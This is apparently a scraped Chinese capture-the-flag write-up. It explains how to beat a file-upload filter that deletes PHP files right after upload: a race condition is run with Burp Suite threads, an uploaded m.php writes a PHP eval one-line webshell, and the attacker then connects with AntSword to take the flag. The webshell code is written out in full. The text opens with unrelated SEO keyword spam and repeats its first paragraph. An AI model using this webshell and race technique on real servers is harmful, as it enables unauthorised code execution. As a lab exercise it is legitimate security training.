温州大型网站设计公司,网站建设的宽带指标要求,良品铺子网站规划和建设,南宁关键词自然排名打开题目链接#xff0c;很常见的文件上传框 经过尝试#xff0c;发现上传东西后会调用upload.php#xff0c;猜测文件被传到upload目录下
随便传了几个类型的文件#xff0c;访问upload目录
发现.php文件以及.htaccess、.user.ini这种配置文件都没有传上去 但是通过抓包…打开题目链接很常见的文件上传框 经过尝试发现上传东西后会调用upload.php猜测文件被传到upload目录下
随便传了几个类型的文件访问upload目录
发现.php文件以及.htaccess、.user.ini这种配置文件都没有传上去 但是通过抓包我们可以发现其实php文件以及配置文件都是上传成功了的响应200 说明文件上传成功但是服务器在短时间内就立刻将其删掉了 这种情况只能采取条件竞争
条件竞争原理当我们成功上传了php文件服务端会在短时间内将其删除我们需要抢在它删除之前访问文件并生成一句话木马文件所以访问包的线程需要大于上传包的线程。
这里我们先写一个用于上传的php文件我这里命名为m.php内容如下
?php fputs(fopen(shell.php, w), ?php eval($_POST[shell]); ?); ?
我们可以使用多线程并发的访问上传的文件总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件m.php一旦我们成功访问到了上传的文件m.php那么它就会向服务器写一个shellshell.php。
换句话说我们最终利用的并不是我们上传的文件上传只是为了能有一刻成功访问一旦访问成功便会写入一句话木马我们最终利用的就是新写入的php文件。 上传m.php利用burpsuite抓包这个是上传包 设置上传包的线程数这里设置为30 设置攻击载荷选择没有负载并且勾上无限期地重复 这里注意一个小细节
如果没有清除有效负载的位置 开始攻击后的请求包中filename为空 清除之后再开始攻击 filenamem.php即我们上传的文件 接下来我们抓访问包
我们直接尝试访问shell.php使用burpsuite进行抓包 同理设置线程数这里设置为80
注意访问包的线程数一定要大于上传包的线程数 设置攻击载荷选择没有负载并且勾上无限期地重复 设置好之后开始攻击
最开始可能访问包都是404或者500
但是过一会儿你再次筛选状态码你就会看到200的响应
这说明条件竞争成功已经成功向服务器写入了shell.php 我们访问upload目录查看确实已经存在shell.php 接下来使用蚁剑连接即可
在html目录下找到flag.php cyberpeace{b2ccdb64cfd4c8f30450d306dab8da1c}
